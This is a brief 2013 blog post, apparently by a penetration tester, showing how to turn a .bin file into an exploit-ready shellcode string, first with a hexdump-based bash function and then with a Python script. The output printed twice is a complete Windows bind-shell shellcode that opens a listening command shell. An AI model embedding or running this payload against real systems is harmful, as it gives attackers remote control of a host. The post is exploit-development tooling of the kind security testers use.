Binary to shellcode
Written on March 2, 2013
The other day I was working on a Windows machine and downloaded a small Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/. I wanted to extract the shellcode from the bin file and pop it into my exploit. On Linux, this can be done with the following:
function bin2sc {
# convert .bin to shellcode
hexdump -v -e '"\\""x" 1/1 "%02x" ""' ${1}
}
Running this prints the shellcode out as one long string:
# bin2sc w32-bind-ngs-shellcode.bin
\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x51\x68\x32\x5f\x33\x32\x68\x66\x56\x77\x73\x68\xb7\x8f\x09\x98\x89\xe6\xb5\x03\x29\xcc\x29\xcc\x89\xe7\xd6\xf3\xaa\x41\x51\x41\x51\x57\x51\x83\xef\x2c\xa4\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x20\x01\xe9\x56\x31\xd2\x42\x8b\x34\x91\x01\xee\xb4\x36\xac\x34\x71\x28\xc4\x3c\x71\x75\xf7\x3a\x27\x75\xeb\x5e\x8b\x4b\x24\x01\xe9\x0f\xb7\x14\x51\x8b\x4b\x1c\x01\xe9\x89\xe8\x03\x04\x91\xab\x80\x3e\x09\x75\x08\x8d\x5e\x04\x53\xff\xd0\x57\x95\x80\x3e\x73\x75\xb1\x5e\xad\xff\xd0\xad\xff\xd0\x95\x81\x2f\xfe\xff\x8f\x33\x6a\x10\x57\xad\x55\xff\xd0\x85\xc0\x74\xf8\x31\xd2\x52\x68\x63\x6d\x64\x20\x8d\x7c\x24\x38\xab\xab\xab\xc6\x47\xe9\x01\x54\x87\x3c\x24\x57\x52\x52\x52\xc6\x47\xef\x08\x57\x52\x52\x57\x52\xff\x56\xe4\x8b\x46\xfc\xe9\xca\xff\xff\xff
However, the Windows machine I was on didn’t have hexdump installed. So I hacked up the following in python that extracts the hexadecimal values from the bin file and prints it out nicely formatted: https://gist.github.com/superkojiman/11164279
Running the script gives us the following output:
C:\ python.exe bin2sc.py w32-bind-ngs-shellcode.bin
"\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08" +
"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x51\x68\x32\x5f\x33" +
"\x32\x68\x66\x56\x77\x73\x68\xb7\x8f\x09\x98\x89\xe6\xb5\x03" +
"\x29\xcc\x29\xcc\x89\xe7\xd6\xf3\xaa\x41\x51\x41\x51\x57\x51" +
"\x83\xef\x2c\xa4\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b" +
"\x4b\x20\x01\xe9\x56\x31\xd2\x42\x8b\x34\x91\x01\xee\xb4\x36" +
"\xac\x34\x71\x28\xc4\x3c\x71\x75\xf7\x3a\x27\x75\xeb\x5e\x8b" +
"\x4b\x24\x01\xe9\x0f\xb7\x14\x51\x8b\x4b\x1c\x01\xe9\x89\xe8" +
"\x03\x04\x91\xab\x80\x3e\x09\x75\x08\x8d\x5e\x04\x53\xff\xd0" +
"\x57\x95\x80\x3e\x73\x75\xb1\x5e\xad\xff\xd0\xad\xff\xd0\x95" +
"\x81\x2f\xfe\xff\x8f\x33\x6a\x10\x57\xad\x55\xff\xd0\x85\xc0" +
"\x74\xf8\x31\xd2\x52\x68\x63\x6d\x64\x20\x8d\x7c\x24\x38\xab" +
"\xab\xab\xc6\x47\xe9\x01\x54\x87\x3c\x24\x57\x52\x52\x52\xc6" +
"\x47\xef\x08\x57\x52\x52\x57\x52\xff\x56\xe4\x8b\x46\xfc\xe9" +
"\xca\xff\xff\xff"
Ta da.